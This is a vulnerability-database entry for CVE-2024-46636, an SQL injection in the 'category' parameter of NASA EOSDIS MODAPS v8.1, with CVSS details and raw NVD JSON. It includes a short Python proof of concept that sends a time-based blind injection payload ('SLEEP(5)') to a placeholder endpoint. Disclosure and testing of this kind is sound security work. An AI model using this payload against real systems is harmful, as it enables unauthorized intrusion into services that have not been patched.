Security Vulnerability Report
中文
CVE-2024-46636 CVSS 9.4 CRITICAL

CVE-2024-46636

Published: 2026-04-27 21:16:21
Last Modified: 2026-04-28 20:12:43

Description

NASA Earth Observing System Data and Information System (EOSDIS) MODAPS v8.1 was discovered to contain a SQL injection vulnerability in the category parameter

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

NASA EOSDIS MODAPS v8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example, replace with actual vulnerable endpoint) target_url = "https://example.com/modaps/vulnerable_endpoint" # Vulnerable parameter: category # Payload demonstrating time-based blind SQL injection payload = "1' AND SLEEP(5)-- -" params = { "category": payload } try: response = requests.get(target_url, params=params, timeout=10) # Check if the response time indicates successful execution if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: SQL Injection in 'category' parameter.") else: print("[-] Vulnerability not detected or patched.") except Exception as e: print(f"Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-46636", "sourceIdentifier": "[email protected]", "published": "2026-04-27T21:16:21.320", "lastModified": "2026-04-28T20:12:42.653", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NASA Earth Observing System Data and Information System (EOSDIS) MODAPS v8.1 was discovered to contain a SQL injection vulnerability in the category parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://bugcrowd.com/Xnu11", "source": "[email protected]"}, {"url": "https://github.com/NU1L0/CVE-2024-46636-SQLi-MODAPS", "source": "[email protected]"}, {"url": "https://www.linkedin.com/in/abdulrahman-aldossary-842b6b26b/", "source": "[email protected]"}]}}